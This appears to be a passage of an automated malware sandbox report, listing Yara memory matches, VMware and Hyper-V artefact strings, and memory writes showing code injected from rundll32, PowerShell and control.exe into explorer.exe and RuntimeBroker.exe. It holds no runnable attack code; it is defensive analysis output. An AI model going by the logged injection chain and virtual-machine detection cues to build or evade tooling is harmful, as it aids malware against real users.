File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: explorer.exe, 0000001B.00000000.408453384.00000000051AC000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00 |
Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_ |
Source: RuntimeBroker.exe, 00000031.00000000.538603337.0000018280A54000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: 2E09.bin.27.dr |
Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel |
Source: 2E09.bin.27.dr |
Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel |
Source: 2E09.bin.27.dr |
Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel |
Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: 2E09.bin.27.dr |
Binary or memory string: vpci Microsoft Hyper-V Virt Kernel |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday |
Source: 2E09.bin.27.dr |
Binary or memory string: storflt Microsoft Hyper-V Stor Kernel |
Source: mshta.exe, 00000013.00000002.342969322.00000162CE011000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ |
Source: 2E09.bin1.48.dr, 2E09.bin.27.dr |
Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No |
Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: RuntimeBroker.exe, 0000002D.00000000.507758371.000001FFC2056000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d |
Source: explorer.exe, 0000001B.00000000.410736983.0000000005138000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00dRom0cY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Memory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Memory written: C:\Windows\System32\control.exe base: 5D0000 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Memory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 360000 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 2760000 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 35E000 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 2740000 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\System32\rundll32.exe base: 15723670000 |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0 |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 418792000 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 491CC81000 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000 |
|
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
|
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy |
Jump to behavior |
